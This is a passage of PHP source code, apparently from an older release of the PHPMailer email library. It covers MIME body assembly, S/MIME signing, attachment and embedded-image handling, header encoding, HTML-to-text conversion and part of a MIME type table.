                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'alt_inline_attach':
                $body .= $mimepre;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->textLine('--' . $this->boundary[2]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[3] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[3], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[3]);
                $body .= $this->LE;
                $body .= $this->endBoundary($this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            default:
                // catch case 'plain' and case ''
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                break;
        }

        if ($this->isError()) {
            $body = '';
        } elseif ($this->sign_key_file) {
            try {
                if (!defined('PKCS7_TEXT')) {
                    throw new phpmailerException($this->lang('extension_missing') . 'openssl');
                }
                // @TODO would be nice to use php://temp streams here, but need to wrap for PHP < 5.1
                $file = tempnam(sys_get_temp_dir(), 'mail');
                if (false === file_put_contents($file, $body)) {
                    throw new phpmailerException($this->lang('signing') . ' Could not write temp file');
                }
                $signed = tempnam(sys_get_temp_dir(), 'signed');
                //Workaround for PHP bug https://bugs.php.net/bug.php?id=69197
                if (empty($this->sign_extracerts_file)) {
                    $sign = @openssl_pkcs7_sign(
                        $file,
                        $signed,
                        'file://' . realpath($this->sign_cert_file),
                        array('file://' . realpath($this->sign_key_file), $this->sign_key_pass),
                        null
                    );
                } else {
                    $sign = @openssl_pkcs7_sign(
                        $file,
                        $signed,
                        'file://' . realpath($this->sign_cert_file),
                        array('file://' . realpath($this->sign_key_file), $this->sign_key_pass),
                        null,
                        PKCS7_DETACHED,
                        $this->sign_extracerts_file
                    );
                }
                if ($sign) {
                    @unlink($file);
                    $body = file_get_contents($signed);
                    @unlink($signed);
                    //The message returned by openssl contains both headers and body, so need to split them up
                    $parts = explode("\n\n", $body, 2);
                    $this->MIMEHeader .= $parts[0] . $this->LE . $this->LE;
                    $body = $parts[1];
                } else {
                    @unlink($file);
                    @unlink($signed);
                    throw new phpmailerException($this->lang('signing') . openssl_error_string());
                }
            } catch (phpmailerException $exc) {
                $body = '';
                if ($this->exceptions) {
                    throw $exc;
                }
            }
        }
        return $body;
    }

    /**
     * Return the start of a message boundary.
     * @access protected
     * @param string $boundary
     * @param string $charSet
     * @param string $contentType
     * @param string $encoding
     * @return string
     */
    protected function getBoundary($boundary, $charSet, $contentType, $encoding)
    {
        $result = '';
        if ($charSet == '') {
            $charSet = $this->CharSet;
        }
        if ($contentType == '') {
            $contentType = $this->ContentType;
        }
        if ($encoding == '') {
            $encoding = $this->Encoding;
        }
        $result .= $this->textLine('--' . $boundary);
        $result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet);
        $result .= $this->LE;
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($encoding != '7bit') {
            $result .= $this->headerLine('Content-Transfer-Encoding', $encoding);
        }
        $result .= $this->LE;

        return $result;
    }

    /**
     * Return the end of a message boundary.
     * @access protected
     * @param string $boundary
     * @return string
     */
    protected function endBoundary($boundary)
    {
        return $this->LE . '--' . $boundary . '--' . $this->LE;
    }

    /**
     * Set the message type.
     * PHPMailer only supports some preset message types,
     * not arbitrary MIME structures.
     * @access protected
     * @return void
     */
    protected function setMessageType()
    {
        $type = array();
        if ($this->alternativeExists()) {
            $type[] = 'alt';
        }
        if ($this->inlineImageExists()) {
            $type[] = 'inline';
        }
        if ($this->attachmentExists()) {
            $type[] = 'attach';
        }
        $this->message_type = implode('_', $type);
        if ($this->message_type == '') {
            $this->message_type = 'plain';
        }
    }

    /**
     * Format a header line.
     * @access public
     * @param string $name
     * @param string $value
     * @return string
     */
    public function headerLine($name, $value)
    {
        return $name . ': ' . $value . $this->LE;
    }

    /**
     * Return a formatted mail line.
     * @access public
     * @param string $value
     * @return string
     */
    public function textLine($value)
    {
        return $value . $this->LE;
    }

    /**
     * Add an attachment from a path on the filesystem.
     * Returns false if the file could not be found or read.
     * @param string $path Path to the attachment.
     * @param string $name Overrides the attachment name.
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type File extension (MIME) type.
     * @param string $disposition Disposition to use
     * @throws phpmailerException
     * @return boolean
     */
    public function addAttachment($path, $name = '', $encoding = 'base64', $type = '', $disposition = 'attachment')
    {
        try {
            if (!@is_file($path)) {
                throw new phpmailerException($this->lang('file_access') . $path, self::STOP_CONTINUE);
            }

            // If a MIME type is not specified, try to work it out from the file name
            if ($type == '') {
                $type = self::filenameToType($path);
            }

            $filename = basename($path);
            if ($name == '') {
                $name = $filename;
            }

            $this->attachment[] = array(
                0 => $path,
                1 => $filename,
                2 => $name,
                3 => $encoding,
                4 => $type,
                5 => false, // isStringAttachment
                6 => $disposition,
                7 => 0
            );

        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            $this->edebug($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
        return true;
    }

    /**
     * Return the array of attachments.
     * @return array
     */
    public function getAttachments()
    {
        return $this->attachment;
    }

    /**
     * Attach all file, string, and binary attachments to the message.
     * Returns an empty string on failure.
     * @access protected
     * @param string $disposition_type
     * @param string $boundary
     * @return string
     */
    protected function attachAll($disposition_type, $boundary)
    {
        // Return text of body
        $mime = array();
        $cidUniq = array();
        $incl = array();

        // Add all attachments
        foreach ($this->attachment as $attachment) {
            // Check if it is a valid disposition_filter
            if ($attachment[6] == $disposition_type) {
                // Check for string attachment
                $string = '';
                $path = '';
                $bString = $attachment[5];
                if ($bString) {
                    $string = $attachment[0];
                } else {
                    $path = $attachment[0];
                }

                $inclhash = md5(serialize($attachment));
                if (in_array($inclhash, $incl)) {
                    continue;
                }
                $incl[] = $inclhash;
                $name = $attachment[2];
                $encoding = $attachment[3];
                $type = $attachment[4];
                $disposition = $attachment[6];
                $cid = $attachment[7];
                if ($disposition == 'inline' && array_key_exists($cid, $cidUniq)) {
                    continue;
                }
                $cidUniq[$cid] = true;

                $mime[] = sprintf('--%s%s', $boundary, $this->LE);
                //Only include a filename property if we have one
                if (!empty($name)) {
                    $mime[] = sprintf(
                        'Content-Type: %s; name="%s"%s',
                        $type,
                        $this->encodeHeader($this->secureHeader($name)),
                        $this->LE
                    );
                } else {
                    $mime[] = sprintf(
                        'Content-Type: %s%s',
                        $type,
                        $this->LE
                    );
                }
                // RFC1341 part 5 says 7bit is assumed if not specified
                if ($encoding != '7bit') {
                    $mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, $this->LE);
                }

                if ($disposition == 'inline') {
                    $mime[] = sprintf('Content-ID: <%s>%s', $cid, $this->LE);
                }

                // If a filename contains any of these chars, it should be quoted,
                // but not otherwise: RFC2183 & RFC2045 5.1
                // Fixes a warning in IETF's msglint MIME checker
                // Allow for bypassing the Content-Disposition header totally
                if (!(empty($disposition))) {
                    $encoded_name = $this->encodeHeader($this->secureHeader($name));
                    if (preg_match('/[ \(\)<>@,;:\\"\/\[\]\?=]/', $encoded_name)) {
                        $mime[] = sprintf(
                            'Content-Disposition: %s; filename="%s"%s',
                            $disposition,
                            $encoded_name,
                            $this->LE . $this->LE
                        );
                    } else {
                        if (!empty($encoded_name)) {
                            $mime[] = sprintf(
                                'Content-Disposition: %s; filename=%s%s',
                                $disposition,
                                $encoded_name,
                                $this->LE . $this->LE
                            );
                        } else {
                            $mime[] = sprintf(
                                'Content-Disposition: %s%s',
                                $disposition,
                                $this->LE . $this->LE
                            );
                        }
                    }
                } else {
                    $mime[] = $this->LE;
                }

                // Encode as string attachment
                if ($bString) {
                    $mime[] = $this->encodeString($string, $encoding);
                    if ($this->isError()) {
                        return '';
                    }
                    $mime[] = $this->LE . $this->LE;
                } else {
                    $mime[] = $this->encodeFile($path, $encoding);
                    if ($this->isError()) {
                        return '';
                    }
                    $mime[] = $this->LE . $this->LE;
                }
            }
        }

        $mime[] = sprintf('--%s--%s', $boundary, $this->LE);

        return implode('', $mime);
    }

    /**
     * Encode a file attachment in requested format.
     * Returns an empty string on failure.
     * @param string $path The full path to the file
     * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
     * @throws phpmailerException
     * @access protected
     * @return string
     */
    protected function encodeFile($path, $encoding = 'base64')
    {
        try {
            if (!is_readable($path)) {
                throw new phpmailerException($this->lang('file_open') . $path, self::STOP_CONTINUE);
            }
            $magic_quotes = get_magic_quotes_runtime();
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '<')) {
                    set_magic_quotes_runtime(false);
                } else {
                    //Doesn't exist in PHP 5.4, but we don't need to check because
                    //get_magic_quotes_runtime always returns false in 5.4+
                    //so it will never get here
                    ini_set('magic_quotes_runtime', false);
                }
            }
            $file_buffer = file_get_contents($path);
            $file_buffer = $this->encodeString($file_buffer, $encoding);
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '<')) {
                    set_magic_quotes_runtime($magic_quotes);
                } else {
                    ini_set('magic_quotes_runtime', $magic_quotes);
                }
            }
            return $file_buffer;
        } catch (Exception $exc) {
            $this->setError($exc->getMessage());
            return '';
        }
    }

    /**
     * Encode a string in requested format.
     * Returns an empty string on failure.
     * @param string $str The text to encode
     * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
     * @access public
     * @return string
     */
    public function encodeString($str, $encoding = 'base64')
    {
        $encoded = '';
        switch (strtolower($encoding)) {
            case 'base64':
                $encoded = chunk_split(base64_encode($str), 76, $this->LE);
                break;
            case '7bit':
            case '8bit':
                $encoded = $this->fixEOL($str);
                // Make sure it ends with a line break
                if (substr($encoded, -(strlen($this->LE))) != $this->LE) {
                    $encoded .= $this->LE;
                }
                break;
            case 'binary':
                $encoded = $str;
                break;
            case 'quoted-printable':
                $encoded = $this->encodeQP($str);
                break;
            default:
                $this->setError($this->lang('encoding') . $encoding);
                break;
        }
        return $encoded;
    }

    /**
     * Encode a header string optimally.
     * Picks shortest of Q, B, quoted-printable or none.
     * @access public
     * @param string $str
     * @param string $position
     * @return string
     */
    public function encodeHeader($str, $position = 'text')
    {
        $matchcount = 0;
        switch (strtolower($position)) {
            case 'phrase':
                if (!preg_match('/[\200-\377]/', $str)) {
                    // Can't use addslashes as we don't know the value of magic_quotes_sybase
                    $encoded = addcslashes($str, "\0..\37\177\\\"");
                    if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) {
                        return ($encoded);
                    } else {
                        return ("\"$encoded\"");
                    }
                }
                $matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches);
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                $matchcount = preg_match_all('/[()"]/', $str, $matches);
                // Intentional fall-through
            case 'text':
            default:
                $matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches);
                break;
        }

        //There are no chars that need encoding
        if ($matchcount == 0) {
            return ($str);
        }

        $maxlen = 75 - 7 - strlen($this->CharSet);
        // Try to select the encoding which should produce the shortest output
        if ($matchcount > strlen($str) / 3) {
            // More than a third of the content will need encoding, so B encoding will be most efficient
            $encoding = 'B';
            if (function_exists('mb_strlen') && $this->hasMultiBytes($str)) {
                // Use a custom function which correctly encodes and wraps long
                // multibyte strings without breaking lines within a character
                $encoded = $this->base64EncodeWrapMB($str, "\n");
            } else {
                $encoded = base64_encode($str);
                $maxlen -= $maxlen % 4;
                $encoded = trim(chunk_split($encoded, $maxlen, "\n"));
            }
        } else {
            $encoding = 'Q';
            $encoded = $this->encodeQ($str, $position);
            $encoded = $this->wrapText($encoded, $maxlen, true);
            $encoded = str_replace('=' . self::CRLF, "\n", trim($encoded));
        }

        $encoded = preg_replace('/^(.*)$/m', ' =?' . $this->CharSet . "?$encoding?\\1?=", $encoded);
        $encoded = trim(str_replace("\n", $this->LE, $encoded));

        return $encoded;
    }

    /**
     * Check if a string contains multi-byte characters.
     * @access public
     * @param string $str multi-byte text to wrap encode
     * @return boolean
     */
    public function hasMultiBytes($str)
    {
        if (function_exists('mb_strlen')) {
            return (strlen($str) > mb_strlen($str, $this->CharSet));
        } else { // Assume no multibytes (we can't handle without mbstring functions anyway)
            return false;
        }
    }

    /**
     * Does a string contain any 8-bit chars (in any charset)?
     * @param string $text
     * @return boolean
     */
    public function has8bitChars($text)
    {
        return (boolean)preg_match('/[\x80-\xFF]/', $text);
    }

    /**
     * Encode and wrap long multibyte strings for mail headers
     * without breaking lines within a character.
     * Adapted from a function by paravoid
     * @link http://www.php.net/manual/en/function.mb-encode-mimeheader.php#60283
     * @access public
     * @param string $str multi-byte text to wrap encode
     * @param string $linebreak string to use as linefeed/end-of-line
     * @return string
     */
    public function base64EncodeWrapMB($str, $linebreak = null)
    {
        $start = '=?' . $this->CharSet . '?B?';
        $end = '?=';
        $encoded = '';
        if ($linebreak === null) {
            $linebreak = $this->LE;
        }

        $mb_length = mb_strlen($str, $this->CharSet);
        // Each line must have length <= 75, including $start and $end
        $length = 75 - strlen($start) - strlen($end);
        // Average multi-byte ratio
        $ratio = $mb_length / strlen($str);
        // Base64 has a 4:3 ratio
        $avgLength = floor($length * $ratio * .75);

        for ($i = 0; $i < $mb_length; $i += $offset) {
            $lookBack = 0;
            do {
                $offset = $avgLength - $lookBack;
                $chunk = mb_substr($str, $i, $offset, $this->CharSet);
                $chunk = base64_encode($chunk);
                $lookBack++;
            } while (strlen($chunk) > $length);
            $encoded .= $chunk . $linebreak;
        }

        // Chomp the last linefeed
        $encoded = substr($encoded, 0, -strlen($linebreak));
        return $encoded;
    }

    /**
     * Encode a string in quoted-printable format.
     * According to RFC2045 section 6.7.
     * @access public
     * @param string $string The text to encode
     * @param integer $line_max Number of chars allowed on a line before wrapping
     * @return string
     * @link http://www.php.net/manual/en/function.quoted-printable-decode.php#89417 Adapted from this comment
     */
    public function encodeQP($string, $line_max = 76)
    {
        // Use native function if it's available (>= PHP5.3)
        if (function_exists('quoted_printable_encode')) {
            return quoted_printable_encode($string);
        }
        // Fall back to a pure PHP implementation
        $string = str_replace(
            array('%20', '%0D%0A.', '%0D%0A', '%'),
            array(' ', "\r\n=2E", "\r\n", '='),
            rawurlencode($string)
        );
        return preg_replace('/[^\r\n]{' . ($line_max - 3) . '}[^=\r\n]{2}/', "$0=\r\n", $string);
    }

    /**
     * Backward compatibility wrapper for an old QP encoding function that was removed.
     * @see PHPMailer::encodeQP()
     * @access public
     * @param string $string
     * @param integer $line_max
     * @param boolean $space_conv
     * @return string
     * @deprecated Use encodeQP instead.
     */
    public function encodeQPphp(
        $string,
        $line_max = 76,
        /** @noinspection PhpUnusedParameterInspection */ $space_conv = false
    ) {
        return $this->encodeQP($string, $line_max);
    }

    /**
     * Encode a string using Q encoding.
     * @link http://tools.ietf.org/html/rfc2047
     * @param string $str the text to encode
     * @param string $position Where the text is going to be used, see the RFC for what that means
     * @access public
     * @return string
     */
    public function encodeQ($str, $position = 'text')
    {
        // There should not be any EOL in the string
        $pattern = '';
        $encoded = str_replace(array("\r", "\n"), '', $str);
        switch (strtolower($position)) {
            case 'phrase':
                // RFC 2047 section 5.3
                $pattern = '^A-Za-z0-9!*+\/ -';
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                // RFC 2047 section 5.2
                $pattern = '\(\)"';
                // intentional fall-through
                // for this reason we build the $pattern without including delimiters and []
            case 'text':
            default:
                // RFC 2047 section 5.1
                // Replace every high ascii, control, =, ? and _ characters
                $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern;
                break;
        }
        $matches = array();
        if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) {
            // If the string contains an '=', make sure it's the first thing we replace
            // so as to avoid double-encoding
            $eqkey = array_search('=', $matches[0]);
            if (false !== $eqkey) {
                unset($matches[0][$eqkey]);
                array_unshift($matches[0], '=');
            }
            foreach (array_unique($matches[0]) as $char) {
                $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded);
            }
        }
        // Replace every spaces to _ (more readable than =20)
        return str_replace(' ', '_', $encoded);
    }

    /**
     * Add a string or binary attachment (non-filesystem).
     * This method can be used to attach ascii or binary data,
     * such as a BLOB record from a database.
     * @param string $string String attachment data.
     * @param string $filename Name of the attachment.
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type File extension (MIME) type.
     * @param string $disposition Disposition to use
     * @return void
     */
    public function addStringAttachment(
        $string,
        $filename,
        $encoding = 'base64',
        $type = '',
        $disposition = 'attachment'
    ) {
        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($filename);
        }
        // Append to $attachment array
        $this->attachment[] = array(
            0 => $string,
            1 => $filename,
            2 => basename($filename),
            3 => $encoding,
            4 => $type,
            5 => true, // isStringAttachment
            6 => $disposition,
            7 => 0
        );
    }

    /**
     * Add an embedded (inline) attachment from a file.
     * This can include images, sounds, and just about any other document type.
     * These differ from 'regular' attachments in that they are intended to be
     * displayed inline with the message, not just attached for download.
     * This is used in HTML messages that embed the images
     * the HTML refers to using the $cid value.
     * @param string $path Path to the attachment.
     * @param string $cid Content ID of the attachment; Use this to reference
     *        the content when using an embedded image in HTML.
     * @param string $name Overrides the attachment name.
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type File MIME type.
     * @param string $disposition Disposition to use
     * @return boolean True on successfully adding an attachment
     */
    public function addEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline')
    {
        if (!@is_file($path)) {
            $this->setError($this->lang('file_access') . $path);
            return false;
        }

        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($path);
        }

        $filename = basename($path);
        if ($name == '') {
            $name = $filename;
        }

        // Append to $attachment array
        $this->attachment[] = array(
            0 => $path,
            1 => $filename,
            2 => $name,
            3 => $encoding,
            4 => $type,
            5 => false, // isStringAttachment
            6 => $disposition,
            7 => $cid
        );
        return true;
    }

    /**
     * Add an embedded stringified attachment.
     * This can include images, sounds, and just about any other document type.
     * Be sure to set the $type to an image type for images:
     * JPEG images use 'image/jpeg', GIF uses 'image/gif', PNG uses 'image/png'.
     * @param string $string The attachment binary data.
     * @param string $cid Content ID of the attachment; Use this to reference
     *        the content when using an embedded image in HTML.
     * @param string $name
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type MIME type.
     * @param string $disposition Disposition to use
     * @return boolean True on successfully adding an attachment
     */
    public function addStringEmbeddedImage(
        $string,
        $cid,
        $name = '',
        $encoding = 'base64',
        $type = '',
        $disposition = 'inline'
    ) {
        // If a MIME type is not specified, try to work it out from the name
        if ($type == '' and !empty($name)) {
            $type = self::filenameToType($name);
        }

        // Append to $attachment array
        $this->attachment[] = array(
            0 => $string,
            1 => $name,
            2 => $name,
            3 => $encoding,
            4 => $type,
            5 => true, // isStringAttachment
            6 => $disposition,
            7 => $cid
        );
        return true;
    }

    /**
     * Check if an inline attachment is present.
     * @access public
     * @return boolean
     */
    public function inlineImageExists()
    {
        foreach ($this->attachment as $attachment) {
            if ($attachment[6] == 'inline') {
                return true;
            }
        }
        return false;
    }

    /**
     * Check if an attachment (non-inline) is present.
     * @return boolean
     */
    public function attachmentExists()
    {
        foreach ($this->attachment as $attachment) {
            if ($attachment[6] == 'attachment') {
                return true;
            }
        }
        return false;
    }

    /**
     * Check if this message has an alternative body set.
     * @return boolean
     */
    public function alternativeExists()
    {
        return !empty($this->AltBody);
    }

    /**
     * Clear queued addresses of given kind.
     * @access protected
     * @param string $kind 'to', 'cc', or 'bcc'
     * @return void
     */
    public function clearQueuedAddresses($kind)
    {
        $RecipientsQueue = $this->RecipientsQueue;
        foreach ($RecipientsQueue as $address => $params) {
            if ($params[0] == $kind) {
                unset($this->RecipientsQueue[$address]);
            }
        }
    }

    /**
     * Clear all To recipients.
     * @return void
     */
    public function clearAddresses()
    {
        foreach ($this->to as $to) {
            unset($this->all_recipients[strtolower($to[0])]);
        }
        $this->to = array();
        $this->clearQueuedAddresses('to');
    }

    /**
     * Clear all CC recipients.
     * @return void
     */
    public function clearCCs()
    {
        foreach ($this->cc as $cc) {
            unset($this->all_recipients[strtolower($cc[0])]);
        }
        $this->cc = array();
        $this->clearQueuedAddresses('cc');
    }

    /**
     * Clear all BCC recipients.
     * @return void
     */
    public function clearBCCs()
    {
        foreach ($this->bcc as $bcc) {
            unset($this->all_recipients[strtolower($bcc[0])]);
        }
        $this->bcc = array();
        $this->clearQueuedAddresses('bcc');
    }

    /**
     * Clear all ReplyTo recipients.
     * @return void
     */
    public function clearReplyTos()
    {
        $this->ReplyTo = array();
        $this->ReplyToQueue = array();
    }

    /**
     * Clear all recipient types.
     * @return void
     */
    public function clearAllRecipients()
    {
        $this->to = array();
        $this->cc = array();
        $this->bcc = array();
        $this->all_recipients = array();
        $this->RecipientsQueue = array();
    }

    /**
     * Clear all filesystem, string, and binary attachments.
     * @return void
     */
    public function clearAttachments()
    {
        $this->attachment = array();
    }

    /**
     * Clear all custom headers.
     * @return void
     */
    public function clearCustomHeaders()
    {
        $this->CustomHeader = array();
    }

    /**
     * Add an error message to the error container.
     * @access protected
     * @param string $msg
     * @return void
     */
    protected function setError($msg)
    {
        $this->error_count++;
        if ($this->Mailer == 'smtp' and !is_null($this->smtp)) {
            $lasterror = $this->smtp->getError();
            if (!empty($lasterror['error'])) {
                $msg .= $this->lang('smtp_error') . $lasterror['error'];
                if (!empty($lasterror['detail'])) {
                    $msg .= ' Detail: '. $lasterror['detail'];
                }
                if (!empty($lasterror['smtp_code'])) {
                    $msg .= ' SMTP code: ' . $lasterror['smtp_code'];
                }
                if (!empty($lasterror['smtp_code_ex'])) {
                    $msg .= ' Additional SMTP info: ' . $lasterror['smtp_code_ex'];
                }
            }
        }
        $this->ErrorInfo = $msg;
    }

    /**
     * Return an RFC 822 formatted date.
     * @access public
     * @return string
     * @static
     */
    public static function rfcDate()
    {
        // Set the time zone to whatever the default is to avoid 500 errors
        // Will default to UTC if it's not set properly in php.ini
        date_default_timezone_set(@date_default_timezone_get());
        return date('D, j M Y H:i:s O');
    }

    /**
     * Get the server hostname.
     * Returns 'localhost.localdomain' if unknown.
     * @access protected
     * @return string
     */
    protected function serverHostname()
    {
        $result = 'localhost.localdomain';
        if (!empty($this->Hostname)) {
            $result = $this->Hostname;
        } elseif (isset($_SERVER) and array_key_exists('SERVER_NAME', $_SERVER) and !empty($_SERVER['SERVER_NAME'])) {
            $result = $_SERVER['SERVER_NAME'];
        } elseif (function_exists('gethostname') && gethostname() !== false) {
            $result = gethostname();
        } elseif (php_uname('n') !== false) {
            $result = php_uname('n');
        }
        return $result;
    }

    /**
     * Get an error message in the current language.
     * @access protected
     * @param string $key
     * @return string
     */
    protected function lang($key)
    {
        if (count($this->language) < 1) {
            $this->setLanguage('en'); // set the default language
        }

        if (array_key_exists($key, $this->language)) {
            if ($key == 'smtp_connect_failed') {
                //Include a link to troubleshooting docs on SMTP connection failure
                //this is by far the biggest cause of support questions
                //but it's usually not PHPMailer's fault.
                return $this->language[$key] . ' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting';
            }
            return $this->language[$key];
        } else {
            //Return the key as a fallback
            return $key;
        }
    }

    /**
     * Check if an error occurred.
     * @access public
     * @return boolean True if an error did occur.
     */
    public function isError()
    {
        return ($this->error_count > 0);
    }

    /**
     * Ensure consistent line endings in a string.
     * Changes every end of line from CRLF, CR or LF to $this->LE.
     * @access public
     * @param string $str String to fixEOL
     * @return string
     */
    public function fixEOL($str)
    {
        // Normalise to \n
        $nstr = str_replace(array("\r\n", "\r"), "\n", $str);
        // Now convert LE as needed
        if ($this->LE !== "\n") {
            $nstr = str_replace("\n", $this->LE, $nstr);
        }
        return $nstr;
    }

    /**
     * Add a custom header.
     * $name value can be overloaded to contain
     * both header name and value (name:value)
     * @access public
     * @param string $name Custom header name
     * @param string $value Header value
     * @return void
     */
    public function addCustomHeader($name, $value = null)
    {
        if ($value === null) {
            // Value passed in as name:value
            $this->CustomHeader[] = explode(':', $name, 2);
        } else {
            $this->CustomHeader[] = array($name, $value);
        }
    }

    /**
     * Returns all custom headers.
     * @return array
     */
    public function getCustomHeaders()
    {
        return $this->CustomHeader;
    }

    /**
     * Create a message from an HTML string.
     * Automatically makes modifications for inline images and backgrounds
     * and creates a plain-text version by converting the HTML.
     * Overwrites any existing values in $this->Body and $this->AltBody
     * @access public
     * @param string $message HTML message string
     * @param string $basedir baseline directory for path
     * @param boolean|callable $advanced Whether to use the internal HTML to text converter
     *    or your own custom converter @see PHPMailer::html2text()
     * @return string $message
     */
    public function msgHTML($message, $basedir = '', $advanced = false)
    {
        preg_match_all('/(src|background)=["\'](.*)["\']/Ui', $message, $images);
        if (array_key_exists(2, $images)) {
            foreach ($images[2] as $imgindex => $url) {
                // Convert data URIs into embedded images
                if (preg_match('#^data:(image[^;,]*)(;base64)?,#', $url, $match)) {
                    $data = substr($url, strpos($url, ','));
                    if ($match[2]) {
                        $data = base64_decode($data);
                    } else {
                        $data = rawurldecode($data);
                    }
                    $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2
                    if ($this->addStringEmbeddedImage($data, $cid, 'embed' . $imgindex, 'base64', $match[1])) {
                        $message = str_replace(
                            $images[0][$imgindex],
                            $images[1][$imgindex] . '="cid:' . $cid . '"',
                            $message
                        );
                    }
                } elseif (substr($url, 0, 4) !== 'cid:' && !preg_match('#^[a-z][a-z0-9+.-]*://#i', $url)) {
                    // Do not change urls for absolute images (thanks to corvuscorax)
                    // Do not change urls that are already inline images
                    $filename = basename($url);
                    $directory = dirname($url);
                    if ($directory == '.') {
                        $directory = '';
                    }
                    $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2
                    if (strlen($basedir) > 1 && substr($basedir, -1) != '/') {
                        $basedir .= '/';
                    }
                    if (strlen($directory) > 1 && substr($directory, -1) != '/') {
                        $directory .= '/';
                    }
                    if ($this->addEmbeddedImage(
                        $basedir . $directory . $filename,
                        $cid,
                        $filename,
                        'base64',
                        self::_mime_types((string)self::mb_pathinfo($filename, PATHINFO_EXTENSION))
                    )
                    ) {
                        $message = preg_replace(
                            '/' . $images[1][$imgindex] . '=["\']' . preg_quote($url, '/') . '["\']/Ui',
                            $images[1][$imgindex] . '="cid:' . $cid . '"',
                            $message
                        );
                    }
                }
            }
        }
        $this->isHTML(true);
        // Convert all message body line breaks to CRLF, makes quoted-printable encoding work much better
        $this->Body = $this->normalizeBreaks($message);
        $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced));
        if (!$this->alternativeExists()) {
            $this->AltBody = 'To view this email message, open it in a program that understands HTML!' .
                self::CRLF . self::CRLF;
        }
        return $this->Body;
    }

    /**
     * Convert an HTML string into plain text.
     * This is used by msgHTML().
     * Note - older versions of this function used a bundled advanced converter
     * which was been removed for license reasons in #232
     * Example usage:
     * <code>
     * // Use default conversion
     * $plain = $mail->html2text($html);
     * // Use your own custom converter
     * $plain = $mail->html2text($html, function($html) {
     *     $converter = new MyHtml2text($html);
     *     return $converter->get_text();
     * });
     * </code>
     * @param string $html The HTML text to convert
     * @param boolean|callable $advanced Any boolean value to use the internal converter,
     *   or provide your own callable for custom conversion.
     * @return string
     */
    public function html2text($html, $advanced = false)
    {
        if (is_callable($advanced)) {
            return call_user_func($advanced, $html);
        }
        return html_entity_decode(
            trim(strip_tags(preg_replace('/<(head|title|style|script)[^>]*>.*?<\/\\1>/si', '', $html))),
            ENT_QUOTES,
            $this->CharSet
        );
    }

    /**
     * Get the MIME type for a file extension.
     * @param string $ext File extension
     * @access public
     * @return string MIME type of file.
     * @static
     */
    public static function _mime_types($ext = '')
    {
        $mimes = array(
            'xl'    => 'application/excel',
            'js'    => 'application/javascript',
            'hqx'   => 'application/mac-binhex40',
            'cpt'   => 'application/mac-compactpro',
            'bin'   => 'application/macbinary',
            'doc'   => 'application/msword',
            'word'  => 'application/msword',
            'xlsx'  => 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
            'xltx'  => 'application/vnd.openxmlformats-officedocument.spreadsheetml.template',
            'potx'  => 'application/vnd.openxmlformats-officedocument.presentationml.template',
            'ppsx'  => 'application/vnd.openxmlformats-officedocument.presentationml.slideshow',
            'pptx'  => 'application/vnd.openxmlformats-officedocument.presentationml.presentation',
            'sldx'  => 'application/vnd.openxmlformats-officedocument.presentationml.slide',
            'docx'  => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
            'dotx'  => 'application/vnd.openxmlformats-officedocument.wordprocessingml.template',
            'xlam'  => 'application/vnd.ms-excel.addin.macroEnabled.12',
            'xlsb'  => 'application/vnd.ms-excel.sheet.binary.macroEnabled.12',
            'class' => 'application/octet-stream',
            'dll'   => 'application/octet-stream',
            'dms'   => 'application/octet-stream',
            'exe'   => 'application/octet-stream',
            'lha'   => 'application/octet-stream',
            'lzh'   => 'application/octet-stream',
            'psd'   => 'application/octet-stream',
            'sea'   => 'application/octet-stream',
            'so'    => 'application/octet-stream',
            'oda'   => 'application/oda',
            'pdf'   => 'application/pdf',
            'ai'    => 'application/postscript',
            'eps'   => 'application/postscript',
            'ps'    => 'application/postscript',
            'smi'   => 'application/smil',
